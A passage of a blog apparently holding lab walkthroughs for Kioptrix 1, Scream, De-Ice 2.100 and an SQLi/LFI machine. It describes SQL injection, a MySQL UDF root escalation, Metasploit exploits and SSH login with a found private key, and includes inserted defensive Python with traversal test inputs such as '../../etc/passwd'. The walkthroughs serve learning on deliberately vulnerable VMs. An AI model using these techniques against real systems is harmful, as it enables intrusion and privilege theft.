<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGcEvD4cpe1CI7X_d8Ra9KlirLgpzR9EfDuED9Uq5NKcBsUHSH3McHiD-dm14miCcnOW-92cF4bab1wbc_OxOYYgEzPYI-JtzHRtz5eewbIsBIrF4dzg_W4hrc2Mq-n4Sr1rFq7AQUU-U/s1600/dirb.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGcEvD4cpe1CI7X_d8Ra9KlirLgpzR9EfDuED9Uq5NKcBsUHSH3McHiD-dm14miCcnOW-92cF4bab1wbc_OxOYYgEzPYI-JtzHRtz5eewbIsBIrF4dzg_W4hrc2Mq-n4Sr1rFq7AQUU-U/s1600/dirb.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent! We can see the <b>/john</b> directory. I browsed it and found a <b>john.php</b> file, but unfortunately executing it gave me nothing.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXZyGBpZfWi1abJcJ8S6oYmFRsRJBE6cHro_fDATkQyPFxIvWNvllzK9W0sJtS0SYRl8GcLrmNw3k3-PIG6n_e_7Ja-1G_SnX9TCrvTlyjg9cnL3Uq7IrI3opHIryzp_JiFyAP2bSo9V0/s1600/lfi.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXZyGBpZfWi1abJcJ8S6oYmFRsRJBE6cHro_fDATkQyPFxIvWNvllzK9W0sJtS0SYRl8GcLrmNw3k3-PIG6n_e_7Ja-1G_SnX9TCrvTlyjg9cnL3Uq7IrI3opHIryzp_JiFyAP2bSo9V0/s1600/lfi.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Wow, look at this! LFI? But let's get back to the SQLi.<br />
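The screenshot shows a <b>page</b>-style parameter being turned into a file path. As an added example (mine, in Python rather than the PHP the VM runs, and not code from the write-up), this is how such a parameter should be mapped to a file before it is included: an allowlist of page names plus a canonical-path containment check. The document root, page names and requests are constructed.<br />

```python
# Added example: safe mapping of a request parameter to an includable file.
# The document root and page names are constructed for the example.
import os


class PageNotAllowed(Exception):
    pass


ALLOWED_PAGES = {"home", "about", "contact"}  # constructed allowlist


def is_contained(root, path):
    """True if `path`, after resolving '..' segments and symlinks, lies under `root`."""
    root = os.path.realpath(root)
    path = os.path.realpath(path)
    return path == root or path.startswith(root.rstrip(os.sep) + os.sep)


def resolve_page(doc_root, requested):
    """Map a request parameter to a file under doc_root/pages, or raise.

    Two independent controls: an allowlist of names that may be included at
    all, and a canonical-path check that the resulting file is still under
    doc_root, so traversal sequences and absolute paths fail even if the
    allowlist is loosened later.
    """
    if requested not in ALLOWED_PAGES:
        raise PageNotAllowed(requested)
    candidate = os.path.join(doc_root, "pages", requested + ".php")
    if not is_contained(doc_root, candidate):
        raise PageNotAllowed(requested)
    return os.path.realpath(candidate)


def try_resolve(doc_root, requested):
    """Convenience wrapper returning None instead of raising."""
    try:
        return resolve_page(doc_root, requested)
    except PageNotAllowed:
        return None


if __name__ == "__main__":
    root = "/srv/constructed-docroot"
    for req in ("home", "../../etc/passwd", "/etc/passwd", "login"):
        print("%-20s -> %s" % (req, try_resolve(root, req)))
```

The allowlist alone would stop the traversal shown in the screenshot; the containment check is there so that a later change (say, loading the list of page names from the database) does not silently reopen the hole.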
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCpLUW61OmqjCy6b_GOHjZxJm453EAc4AjQ_9EBJvGc-siQlDCp9SMtGSH-2A6QazC60ghB6-mh4AC5z3xMio3a0ZJSKTv4wzpDh83kzsgxRIAjSn62qANbRwDjlhs-ry0dWEIledypcg/s1600/mysql.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCpLUW61OmqjCy6b_GOHjZxJm453EAc4AjQ_9EBJvGc-siQlDCp9SMtGSH-2A6QazC60ghB6-mh4AC5z3xMio3a0ZJSKTv4wzpDh83kzsgxRIAjSn62qANbRwDjlhs-ry0dWEIledypcg/s1600/mysql.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
Great! Let's go deeper.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2sN8gyBywBHJIP1_hCO196avtVulc7nauLk38qA7KIgrwI-Pfu7KwUoTk-aHQOMxiPxgYUzwqrSyR9h0V1B8FKBlf5fB-5jUTiFMXDU7aa-4ihVRvbCSOxvNneIxKml3UdXzDkdOw3sI/s1600/user.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2sN8gyBywBHJIP1_hCO196avtVulc7nauLk38qA7KIgrwI-Pfu7KwUoTk-aHQOMxiPxgYUzwqrSyR9h0V1B8FKBlf5fB-5jUTiFMXDU7aa-4ihVRvbCSOxvNneIxKml3UdXzDkdOw3sI/s1600/user.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Awesome, we have got credentials! So let's try to log in via SSH.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJdOlyPPvz0gfoB0FzyVkBIx0oS6JO7D3EVZtlEDWICzFgxXh07V6jPhDwsWfKr9SOm2ZnZJUm3Lg3c-JBzXvukN9AyjkB4mQoG6vXhHLJ4mV7GOx7taXWDZFq-DZpV5-TgyUJEWVxLfg/s1600/ssh.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJdOlyPPvz0gfoB0FzyVkBIx0oS6JO7D3EVZtlEDWICzFgxXh07V6jPhDwsWfKr9SOm2ZnZJUm3Lg3c-JBzXvukN9AyjkB4mQoG6vXhHLJ4mV7GOx7taXWDZFq-DZpV5-TgyUJEWVxLfg/s1600/ssh.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Very good, but we only have a restricted shell. This is very helpful: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/<br />
Wow!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlT4G-L4jHgfDaKvFig1k-k6ZVnLvPKuWq5H8EM_QwX2gUgtjK-2td0JHVG_oFN48PXnNPPJC66RIDdinDiG0Q03ENy04gTXy6YBYe3UZUNqxMlPjmJMjGvTLASV5kUH8JITx76AEzbos/s1600/game.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlT4G-L4jHgfDaKvFig1k-k6ZVnLvPKuWq5H8EM_QwX2gUgtjK-2td0JHVG_oFN48PXnNPPJC66RIDdinDiG0Q03ENy04gTXy6YBYe3UZUNqxMlPjmJMjGvTLASV5kUH8JITx76AEzbos/s1600/game.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Are you surprised? I am! But we can't connect to our attacker machine from the target using e.g. wget. Probably a firewall blocks the traffic. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY5rGmuCw4uVylmz3PO08-tb1tiaNc_xzLmI3vroQdE5c_QqKTOI4gPvYza118ev1fG9Izh5uyKbMtgnrGnsLLiPU4PO8VCSiRCjJeRUfqvBe-R8CKKqtEQFAJjXhj9GyDstKwllvIWfs/s1600/shadow.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjY5rGmuCw4uVylmz3PO08-tb1tiaNc_xzLmI3vroQdE5c_QqKTOI4gPvYza118ev1fG9Izh5uyKbMtgnrGnsLLiPU4PO8VCSiRCjJeRUfqvBe-R8CKKqtEQFAJjXhj9GyDstKwllvIWfs/s1600/shadow.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent! We are able to exploit a UDF: http://www.iodigitalsec.com/mysql-root-to-system-root-with-udf-for-windows-and-linux/<br />
<br />
So, I changed the iptables rules to accept all inbound and outbound traffic. Now we could download a local root exploit, but we are clever and we don't need an exploit to get root privileges.<br />
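The UDF route only works because the MySQL daemon itself runs as the operating-system root and may write files anywhere. As an added example (mine, not from the write-up), here is a small audit of a my.cnf <b>[mysqld]</b> section for those two settings; the configuration texts are constructed, with a weak one beside a hardened one.<br />

```python
# Added example: audit a my.cnf for the settings that turn a MySQL root login
# into a system root shell through a UDF. The config texts are constructed.
import configparser

WEAK_CNF = """
[mysqld]
user = root
datadir = /var/lib/mysql
"""

HARDENED_CNF = """
[mysqld]
user = mysql
datadir = /var/lib/mysql
secure_file_priv = /var/lib/mysql-files
local_infile = 0
"""


def audit_mysqld(cnf_text):
    """Return a list of finding strings for the [mysqld] section."""
    cp = configparser.ConfigParser(allow_no_value=True, strict=False)
    cp.read_string(cnf_text)
    if not cp.has_section("mysqld"):
        return ["no [mysqld] section found"]
    s = cp["mysqld"]
    findings = []

    # The daemon's OS account: a UDF runs with whatever privileges mysqld has.
    if (s.get("user") or "").strip() == "root":
        findings.append("mysqld runs as the OS root user (user=root)")

    # Where the server may read and write files. Unset or empty means no
    # restriction, so SELECT ... INTO DUMPFILE can drop a shared object into
    # the plugin directory. my.cnf accepts both spellings of the key.
    sfp = s.get("secure_file_priv", s.get("secure-file-priv"))
    if sfp is None or sfp.strip() == "":
        findings.append(
            "secure_file_priv is unset: file export is not confined to a directory"
        )

    # Explicitly enabled LOAD DATA LOCAL lets the server pull client-side files.
    if (s.get("local_infile") or "").strip().lower() in ("1", "on"):
        findings.append("local_infile is explicitly enabled")

    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CNF), ("hardened", HARDENED_CNF)):
        print(label, audit_mysqld(text) or ["no findings"])
```

Running the service as a dedicated account and pinning <b>secure_file_priv</b> to a directory that is not the plugin directory are the two changes that close this escalation; the database root password leaking through SQLi would then still be a serious finding, but not a system root.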
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip_35Q8dViQBq_-QYfIajM05oDtQ-cXEmPGfA4tnyVLsZzy154TdlxwqRhE18TABIXNyHhdHM_p8qQmfeB7UISXI6fOlKAV1XXOHWdp5YJez3nIlS9Wx1aeInEYKu5OVvAql8XtmcJobY/s1600/root.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="584" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip_35Q8dViQBq_-QYfIajM05oDtQ-cXEmPGfA4tnyVLsZzy154TdlxwqRhE18TABIXNyHhdHM_p8qQmfeB7UISXI6fOlKAV1XXOHWdp5YJez3nIlS9Wx1aeInEYKu5OVvAql8XtmcJobY/s640/root.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Game over<br />
<br />
<b>Kioptrix 1</b> (rgolebiowski, published 2016-07-20)<br />
Hello,<br />
This Kioptrix VM image is an easy challenge. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There is more than one way to successfully complete the challenges.<br />
<br />
I ran nmap against all ports.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXZ2bDwHw2tJGPHQsO659IhGnZjieH20SgWTILmxFk6rKoLz9-OizrZK-NlUPHmoun2WwP6MxwPYlqHBBErVWZdkYJH4I2zQfxn7eZHKEOk5fo8lmuFysKNyS6fr2DKcMmHAvr7oYKbFM/s1600/scan.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXZ2bDwHw2tJGPHQsO659IhGnZjieH20SgWTILmxFk6rKoLz9-OizrZK-NlUPHmoun2WwP6MxwPYlqHBBErVWZdkYJH4I2zQfxn7eZHKEOk5fo8lmuFysKNyS6fr2DKcMmHAvr7oYKbFM/s1600/scan.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Wow, OpenSSH and Apache are so old. Let's try to find a suitable exploit for them. BINGO! OpenFuck should be suitable for Apache 1.3.20. Oops... It doesn't work...<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYIdR8QjofG5mNELL4-6Y1mqqu29MldBskt_7gUN-UhLZZuhHGiyMZ1VlZinVL5y5aaix6GU3KqXpYNkbm57tghYgyKxhrZ3vmDZjBFENNrtHI-ogBlkaQCJAqlYiVGMTYBxIb5ItbTJ0/s1600/open.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYIdR8QjofG5mNELL4-6Y1mqqu29MldBskt_7gUN-UhLZZuhHGiyMZ1VlZinVL5y5aaix6GU3KqXpYNkbm57tghYgyKxhrZ3vmDZjBFENNrtHI-ogBlkaQCJAqlYiVGMTYBxIb5ItbTJ0/s1600/open.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Surprise... Hmm, we have to keep looking for a suitable exploit.<br />
We can use Metasploit and the <b>trans2open</b> exploit for Samba against our target. When we run the exploit we get <b>root</b> directly.<br />
<br />
Game Over!<br />
<br />
<b>Scream challenge</b> (rgolebiowski, published 2016-07-19)<br />
Hello,<br />
<br />
This challenge is a vulnerable Windows XP machine. Thanks to g0tmi1k for preparing the challenge.<br />
<br />
Scanning all TCP ports in aggressive mode.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkveEEBdH1EgCARCpkJwzAhdjUuo-Dq_CJlBRSwbiH5K_B2QSexDHdfwxCAp0m_qhPIUEOUhiPrNgzSfOIpFoCTqgiFBnHqq0E5xz3sDmhBO2Ll0zwFqPfN3ZZ8okyGwu9kOm-Pov2VRE/s1600/scan.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkveEEBdH1EgCARCpkJwzAhdjUuo-Dq_CJlBRSwbiH5K_B2QSexDHdfwxCAp0m_qhPIUEOUhiPrNgzSfOIpFoCTqgiFBnHqq0E5xz3sDmhBO2Ll0zwFqPfN3ZZ8okyGwu9kOm-Pov2VRE/s1600/scan.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Good, we know what services our target runs. To be honest I am a little surprised; only four open ports on Windows is a good result. We can see that we are able to log in to FTP as an anonymous user. As far as I know this FTP version has a publicly known buffer overflow exploit.<br />
Despite the fact that we can log in as anonymous, let's browse the web application.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzL5sCyEqGehiQSUCNUD9D7EepBWdv_viYfS445_LIZTn9r9fVI_sxLpfr0Ulaq_xsvvai4h4AJcWr-5XHLXBWoG7sWHLX3Oa0XZgsqLkka-9AeNBI4OKJaeFZjnOuARp8ByPZtbp8GSg/s1600/scream.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzL5sCyEqGehiQSUCNUD9D7EepBWdv_viYfS445_LIZTn9r9fVI_sxLpfr0Ulaq_xsvvai4h4AJcWr-5XHLXBWoG7sWHLX3Oa0XZgsqLkka-9AeNBI4OKJaeFZjnOuARp8ByPZtbp8GSg/s1600/scream.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Wow! So beautiful! I ran dirb, but it didn't find any other pages... So, we have to focus on FTP.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwwa8sqM9mbQxgR0YtUafbLiaMFc7L6I9QWV2a2UBSCDB1uLDni613OSAbcKqIKo_WdXUv3M51feJbu6aRdTomN_RKupZUQ_hoya9kCwYk3cjom-5YeH0P64Y4StIjEM9fhAoqPnWdNuY/s1600/ftp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwwa8sqM9mbQxgR0YtUafbLiaMFc7L6I9QWV2a2UBSCDB1uLDni613OSAbcKqIKo_WdXUv3M51feJbu6aRdTomN_RKupZUQ_hoya9kCwYk3cjom-5YeH0P64Y4StIjEM9fhAoqPnWdNuY/s1600/ftp.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, we know that the pages are in the root directory, so maybe we will be able to upload our reverse shell script? Unfortunately the anonymous user does not have sufficient privileges in any directory.<br />
I also tried Metasploit exploits, but without success... Let's try playing with SSH.<br />
BINGO! We can use the <b>freesshd_authbypass</b> exploit and we get SYSTEM privileges (the equivalent of <b>root</b> on Unix).<br />
Game Over!<br />
<br />
<br />
<br />
<b>De-Ice 2.100</b> (rgolebiowski, published 2016-07-18)<br />
Hello,<br />
<br />
Scenario<br />
"The scenario for this LiveCD is that you have been given an assignment to test a company's 192.168.2.xxx network to identify any vulnerabilities or exploits. The systems within this network are not critical systems and recent backups have been created and tested, so any damage you might cause is of little concern. The organization has had multiple system administrators manage the network over the last couple of years, and they are unsure of the competency previous (or current) staff2"<br />
<br />
Scanning<br />
<blockquote class="tr_bq">
PORT STATE SERVICE VERSION<br />
<b>20/tcp closed ftp-data<br />21/tcp open ftp vsftpd 2.0.4</b><br />
| ftp-anon: Anonymous FTP login allowed (FTP code 230)<br />
|_Can't get directory listing: TIMEOUT<br />
<b>22/tcp open ssh OpenSSH 4.3 (protocol 1.99)</b><br />
| ssh-hostkey: <br />
| 2048 83:4f:8b:e9:ea:84:20:0d:3d:11:2b:f0:90:ca:79:1c (RSA1)<br />
| 2048 6f:db:a5:12:68:cd:ad:a9:9c:cd:1e:7b:97:1a:4c:9f (DSA)<br />
|_ 2048 ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10 (RSA)<br />
|_sshv1: Server supports SSHv1<br />
<b>25/tcp open smtp?</b><br />
|_smtp-commands: Couldn't establish connection on port 25<br />
<b>80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)</b><br />
|_http-server-header: Apache/2.0.55 (Unix) PHP/5.1.2<br />
|_http-title: Site doesn't have a title (text/html).<br />
<b>110/tcp open pop3 Openwall popa3d<br />143/tcp open imap UW imapd 2004.357</b><br />
|_imap-capabilities: IDLE IMAP4REV1 BINARY THREAD=REFERENCES SORT completed SCAN CAPABILITY OK MULTIAPPEND THREAD=ORDEREDSUBJECT STARTTLS MAILBOX-REFERRALS AUTH=LOGINA0001 LITERAL+ SASL-IR UNSELECT NAMESPACE LOGIN-REFERRALS<br />
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)<br />
<b>443/tcp closed https</b></blockquote>
I tried to log in to the FTP service as anonymous, but without success. I did get a 230 response, but I can't list the directory. Probably we need a user with higher privileges.<br />
<br />
The default web page looks as below.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwsUeYltOgSKJyr_ZdLULvDhPkoRH2XxrhootSeDWyB10hzglx7Co2CJ5uk5AMts0att4xZ2wlXUV2i3uvSGZDQSh6MI9bOjukiTbCrt2C_wizrGCM_Vv9wGru0zTcq74VzkmOMHWqbQU/s1600/web.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="483" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwsUeYltOgSKJyr_ZdLULvDhPkoRH2XxrhootSeDWyB10hzglx7Co2CJ5uk5AMts0att4xZ2wlXUV2i3uvSGZDQSh6MI9bOjukiTbCrt2C_wizrGCM_Vv9wGru0zTcq74VzkmOMHWqbQU/s640/web.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Nice web page. We can see three links, but let's run DirBuster anyway.<br />
In the meantime I clicked on the <b>CLICK HERE</b> link and got something interesting!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6sF1Fj0fA05H3n_HeE-ERG4ig2edAoqA8YWtAliQRMxhGFv4ij3Mgvv8yuQaDZhXRQ6eAddI8yTryimyQA3dnL4t847bxAx9TU877z_F54grr7X5uIYb1TgKtUhpcxEFgGbFoCRIbPsY/s1600/usernames.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6sF1Fj0fA05H3n_HeE-ERG4ig2edAoqA8YWtAliQRMxhGFv4ij3Mgvv8yuQaDZhXRQ6eAddI8yTryimyQA3dnL4t847bxAx9TU877z_F54grr7X5uIYb1TgKtUhpcxEFgGbFoCRIbPsY/s640/usernames.png" width="570" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Great! There is a list of usernames, I think.<br />
DirBuster gave us this result.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj7ErSqyxsfp52eyLgFEchIiZn5XPlBlsYo75kkQ1IwVeuhCy4pD6fp-Ib-pvH5PGEgJJoatvg-O9qqPVprW77XlY6SlEyQBpU6WA3SH_qXQZmPKtNt_DHtlSdhvedsE4wh593JsTT7NM/s1600/dirbuster.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjj7ErSqyxsfp52eyLgFEchIiZn5XPlBlsYo75kkQ1IwVeuhCy4pD6fp-Ib-pvH5PGEgJJoatvg-O9qqPVprW77XlY6SlEyQBpU6WA3SH_qXQZmPKtNt_DHtlSdhvedsE4wh593JsTT7NM/s1600/dirbuster.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, there are not many files. I created a list of usernames and tried to brute-force FTP and SSH, but without success. I have no idea how to attack this machine. So, maybe we need a little bit more enumeration.<br />
<blockquote class="tr_bq">
Nmap scan report for 192.168.2.100<br />
Host is up (0.00016s latency).<br />
MAC Address: 08:00:27:53:0C:11 (Oracle VirtualBox virtual NIC)<br />
Nmap scan report for 192.168.2.101<br />
Host is up (0.00016s latency).<br />
MAC Address: 08:00:27:53:0C:11 (Oracle VirtualBox virtual NIC)<br />
Nmap scan report for 192.168.2.1</blockquote>
So, 192.168.2.100 is our target, 192.168.2.1 is our attacker machine, but what is 192.168.2.101?<br />
<blockquote class="tr_bq">
PORT STATE SERVICE VERSION<br />
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)<br />
| http-methods: <br />
|_ Potentially risky methods: TRACE<br />
|_http-server-header: Apache/2.0.55 (Unix) PHP/5.1.2<br />
|_http-title: Site doesn't have a title (text/html).</blockquote>
Wow, what is that?<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgkvKN1fjnv0B2rBvaFv267feroextyfYn0K_ttkAFzae9JKESFwMQVpxg_ltNnZJVxQyutiNgxFzJHCye8QbVW2ZRmBLvhBoF8BUg9FvK3uTBuqTlchvN0CCT24BF_wkJ4-Fot4wyKAI/s1600/security.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgkvKN1fjnv0B2rBvaFv267feroextyfYn0K_ttkAFzae9JKESFwMQVpxg_ltNnZJVxQyutiNgxFzJHCye8QbVW2ZRmBLvhBoF8BUg9FvK3uTBuqTlchvN0CCT24BF_wkJ4-Fot4wyKAI/s640/security.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I ran DirBuster and the <b>/home/root</b> directory was found! So maybe there are other users' home directories? BINGO! We found a private and public key for SSH.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR8ZhP4D1V8IB2YlBcXj_52weQft8fCwQ8uyKCPbaf6ZkiixgPuH6VLjqSB0ualLh5_jDN6EEsQSPnRJTcJ6l-PqIFSZTIpNu6shJaxb4n9d5_SG10r-NT47vGEEKPGsrAVCpRG6EwYT8/s1600/home.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR8ZhP4D1V8IB2YlBcXj_52weQft8fCwQ8uyKCPbaf6ZkiixgPuH6VLjqSB0ualLh5_jDN6EEsQSPnRJTcJ6l-PqIFSZTIpNu6shJaxb4n9d5_SG10r-NT47vGEEKPGsrAVCpRG6EwYT8/s1600/home.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Interesting... So, I downloaded the private key and used it to log in as pirrip.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7vNZ97uJfj_0vphRHXw-eL6DK8YvLSsM-GFCX6Qkg7IodIDbfgxaWx_ofcilBJXMI7rxyWW51n6kKZ-ldBxPd02uDQUvD_YiX1oMu6gQ3kM8cvlZj1DfowlZhTTJRBqgS33JTnrlwWk8/s1600/ssh.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7vNZ97uJfj_0vphRHXw-eL6DK8YvLSsM-GFCX6Qkg7IodIDbfgxaWx_ofcilBJXMI7rxyWW51n6kKZ-ldBxPd02uDQUvD_YiX1oMu6gQ3kM8cvlZj1DfowlZhTTJRBqgS33JTnrlwWk8/s1600/ssh.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I have found something interesting in the <b>/var/mail</b> directory.<br />
<blockquote class="tr_bq">
pirrip@slax:/var/mail$ ls<br />havisham magwitch pirrip</blockquote>
So, let's check what information these mails contain. Our user has some very juicy information.<br />
<blockquote class="tr_bq">
From: Estella Havisham <havisham@slax.example.net><br />Message-Id: <200801132350.m0DNoXfV010468@slax.example.net><br />Date: Sun, 13 Jan 2008 23:50:33 +0000<br />To: pirrip@slax.example.net<br />Subject: welcome to the team<br />User-Agent: nail 11.25 7/29/05<br />MIME-Version: 1.0<br />Content-Type: text/plain; charset=us-ascii<br />Content-Transfer-Encoding: 7bit<br /><br />Thanks! Glad to be here.<br /><br />From magwitch@slax.example.net Sun Jan 13 23:53:37 2008<br />Return-Path: <magwitch@slax.example.net><br />Received: from slax.example.net (localhost [127.0.0.1])<br /> by slax.example.net (8.13.7/8.13.7) with ESMTP id m0DNmvpV009983<br /> for <pirrip@slax.example.net>; Sun, 13 Jan 2008 23:48:57 GMT<br />Received: (from magwitch@localhost)<br /> by slax.example.net (8.13.7/8.13.7/Submit) id m0DNmvpd009982<br /> for pirrip; Sun, 13 Jan 2008 23:48:57 GMT<br />From: Abel Magwitch <magwitch@slax.example.net><br />Message-Id: <200801132348.m0DNmvpd009982@slax.example.net><br />Date: Sun, 13 